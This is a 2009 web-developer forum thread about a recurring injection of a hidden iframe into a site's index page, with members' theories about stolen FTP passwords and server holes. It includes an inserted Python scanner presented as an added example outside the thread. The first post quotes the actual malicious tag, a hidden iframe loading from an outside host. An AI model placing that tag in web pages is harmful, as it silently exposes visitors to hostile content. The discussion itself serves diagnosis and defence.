
about an attack

  • Tapan
    Message 1 of 9 , Jul 30, 2009
      Hi experts,
      Hope you are all fine, but I am suffering from an attack.

      Let me explain the problem. Whenever I upload a clean index file to the host, it stays OK for some time, but after a certain period I find that an iframe tag has been included after the <body> tag; I don't know how.

      <iframe src="http://xq9.ru:8080/index.php" width=192 height=173 style="visibility: hidden"></iframe>

      This is the code. Because of this, my whole site is pushed down 173 px from the top.

      What is your experience with this, experts? Please help me with this issue.

      thanks in advance
      Tapan
    • Lenin
      Message 2 of 9 , Jul 30, 2009
        Change all your FTP and hosting login passwords. There are some viruses which use your FTP client while it is transferring files to your host.

        Clean the machine from which you upload the files. The attack is through the socket, or a password stealer.
      • shiplu
        Message 3 of 9 , Jul 30, 2009
          On Thu, Jul 30, 2009 at 2:46 PM, Tapan <tapan29bd@...> wrote:
          > Hi experts,
          > Hope you are all fine, but I am suffering from an attack.
          >
          > Let me explain the problem. Whenever I upload a clean index file to the host, it stays OK for some time, but after a certain period I find that an iframe tag has been included after the <body> tag; I don't know how.
          Do you upload any clean index.html or index.php file?
          Is it a CMS?

          --
          A K M Mokaddim
          http://talk.cmyweb.net
          http://twitter.com/shiplu
          Stop Top Posting !!
          Writing in Bangla is much better than writing in Banglish
          Sent from Dhaka, Bangladesh
        • Enayet Husain
          Message 4 of 9 , Jul 30, 2009
            Hi,

            What is the most effective antivirus to remove this malware/virus?

            I am using AVIRA. Not bad. It can also track the iframe code in html/php files.


            Thank you,
            Enayet




            contact@...
            www.enayet.net
            www.rajibsl.com




          • Raisul Kabir
            Message 5 of 9 , Aug 3, 2009
              There is a high possibility it might not be a virus. It might be a security hole in Apache or PHP which is exposing the FTP un/pw and through which it got access to all the files. Let your hosting company know about the problem, change the password and upload a clean file. Please note that changing the password is required; it comes above everything else. Because there is some sort of bot continuously changing your files, the only way to prevent it is to change the password first.

              I had this attack a few days ago and it was continuously changing files. I formatted my PC and yet it had no effect. But after changing the password there was no attack. The same happened for a couple of other sites of mine and of some friends of mine. So far I haven't seen this attack on any Windows server, so there is a possibility it might be Apache's or Linux's bug.

              Raisul


              --------------------
              Raisul Kabir, CTO, BrainStation-23
              H-480, R-32, Mohakhali, New DOHS,
              Dhaka, Bangladesh
              cell: +8801713458492
              email: raisul@... raisulk@... raisul@...
              skype: raisulk gtalk: raisulk





            • Lenin
              Message 6 of 9 , Aug 3, 2009
                On Tue, Aug 4, 2009 at 11:32 AM, Raisul Kabir <raisulk@...> wrote:

                > There is a high possibility it might not be a virus. It might be a security hole in Apache or PHP which is exposing the FTP un/pw and through which it got access to all the files. Let your hosting company know about the problem, change the password and upload a clean file. Please note that changing the password is required; it comes above everything else. Because there is some sort of bot continuously changing your files, the only way to prevent it is to change the password first.

                Whatever it may be, we should be well aware of the common security flaws there might be. And if the key of a lock is stolen or found to be cloned, we should change the lock.

                > I had this attack a few days ago and it was continuously changing files. I formatted my PC and yet it had no effect. But after changing the password there was no attack. The same happened for a couple of other sites of mine and of some friends of mine. So far I haven't seen this attack on any Windows server, so there is a possibility it might be Apache's or Linux's bug.

                Well, concluding that it might be a Linux bug is too early in my consideration, because there's no such buzz about it yet. And depending upon your own experience could be a biased one. To be sure it was not a virus or worm which utilizes the socket or any other method, your development machine could be a Linux one (eliminating prior chances of letting a virus into your local machine).

                As a part of security, you should always be changing your important passwords.
              • Sabuj Kundu
                Message 7 of 9 , Aug 3, 2009
                  Dear Raisul,

                  Heh heh, so many "might be"s... OK, leave this. In my experience, I haven't worked on any live Windows server yet. I think most servers are more secure because they host so many sites, and if this happens to one site then the same will happen to all.

                  I have had two types of experience:

                  One:

                  I think most developers use an FTP manager like FileZilla or others (most hosting doesn't allow SSH for shared accounts). If you check how FileZilla saves passwords... it just uses an XML file, so it's not hard to make a virus that steals passwords from that file. If your PC is not secured, I mean no antivirus but using Windows (:P), then it may happen that the virus steals the password, and the rest is what is seen. Yes, this happened to one of my clients. At first I uploaded from my localhost to live and there was no problem with the iframe attack or this type of attack. Then when the client uploaded files from his computer the site was affected, and when I checked, his computer was full of viruses.


                  Two: All sites of the same client got affected. This time I should say there may be a server issue too. Once the same thing happened to one of my clients. All the file uploading was done by me (I am using Windows and FileZilla) but his 4/5 sites were all affected. The hosting company was informed but they didn't respond this time. We changed hosting and it didn't happen again.

                  Hey, "apache's or linux's bug": don't you think that is a funny and weightless comment? If there were any such bug in Apache (I am not saying there is no bug) then all hosting companies should run for food at the same time. And Linux's bug??? Is Linux a single piece of software?


                  thanks.

                  ........................
                  Sabuj Kumar Kundu
                  About Me: http://blog.manchumahara.com/about/
                  http://blog.manchumahara.com
                  http://forum.amaderprojukti.com
                  http://gallery.amaderprojukti.com
                  http://mkabya.page.tl







                • Raisul Kabir
                  Message 8 of 9 , Aug 5, 2009
                    I have reasons to believe it's a hole in Apache, because the Apache mailing list is the only place where I found a mention of this iframe attack.

                    There were two iframe attacks. One was from one's own PC, which happened around 2-3 years back. The other is the recent one, which started in April. Maybe your experience was with a client who was affected by the first type of virus. It affects the local PC's files. The recent one has not yet been reported to be caught by any virus scanner.

                    At first I thought it was a virus on my PC which was doing this. I formatted my PC and it was still happening. For some sites that clients reported as affected, I didn't even have the passwords. Of course the client can be tricked by the virus as well. But there are too many coincidences. Also, if it were a virus on my PC, then changing the password should not make any difference. But it made a difference.

                    Then I thought it was a bug in my coding style. But I found that a couple of WordPress, Joomla and other HTML sites were affected. And not only mine; many of my friends' sites were affected. So it is definitely not PHP coding.

                    Good news for CI devs: no CI site was affected. That's because this bot searches only for index/home ... this sort of common PHP and HTML files. CI has only index. Then in that file, it searches for the <body> tag; sometimes it inserts after body, sometimes it inserts after the html end tag. The CI index page has neither (since it takes them from the view). So no CI site was affected.

                    I don't have a very good understanding of Apache variables. But I found on the Apache mailing list that keeping something open might create a hole which will expose the password. It's not exactly a bug, more a potential security hole, something like PHP's register globals.

                    Best regards.

                    Raisul
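
The injection pattern described in this message (index/home pages, a hidden iframe placed after <body> or after the closing html tag) can be checked for on the server. The scanner below is an added example and is not part of the original thread; the host injected.example, the extra "default" file name and the allowed_hosts parameter are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# File names the thread says the bot targets; "default" is an added assumption.
TARGET = re.compile(r"^(index|home|default)\.(php|html?)$", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class IframeAudit(HTMLParser):
    # Collects iframes that load from a foreign host and are made invisible.
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.past_html_end = False
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.past_html_end = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not host or host in self.allowed:
            return  # relative URL or explicitly trusted embed
        reasons = []
        if HIDDEN.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        if a.get("width") in ("0", "1") or a.get("height") in ("0", "1"):
            reasons.append("0/1 px size")
        if self.past_html_end:
            reasons.append("placed after </html>")
        if reasons:
            self.findings.append((self.getpos()[0], a["src"], reasons))

def scan_html(text, allowed_hosts=()):
    audit = IframeAudit(allowed_hosts)
    audit.feed(text)
    audit.close()
    return audit.findings  # list of (line, src, reasons)

def scan_tree(root, allowed_hosts=()):
    """Map each index/home page under root to its suspicious iframes."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and TARGET.match(path.name):
            hits = scan_html(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample shaped like the tag in the first post (host replaced).
SAMPLE = ('<html>\n<body>\n<iframe src="http://injected.example:8080/index.php" '
          'width=192 height=173 style="visibility: hidden"></iframe>\n'
          '<h1>Home</h1>\n</body>\n</html>\n')

if __name__ == "__main__":
    for line, src, why in scan_html(SAMPLE):
        print(f"line {line}: {src} ({', '.join(why)})")
```

Running scan_tree over the web root from a scheduled job, and comparing the result with the previous run, shows when a page was altered again after a clean upload.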








                  • Raisul Kabir
                    Message 9 of 9 , Aug 5, 2009
                      You are right Lenin bhai. My mistake, please ignore my conclusion about Linux, most of my php sites are hosted in Linux, very few were in windows. So, no conclusion can be drawn from there, you are right.
                      But, all the asp.net applications were in windows and none were affected.

                      Raisul

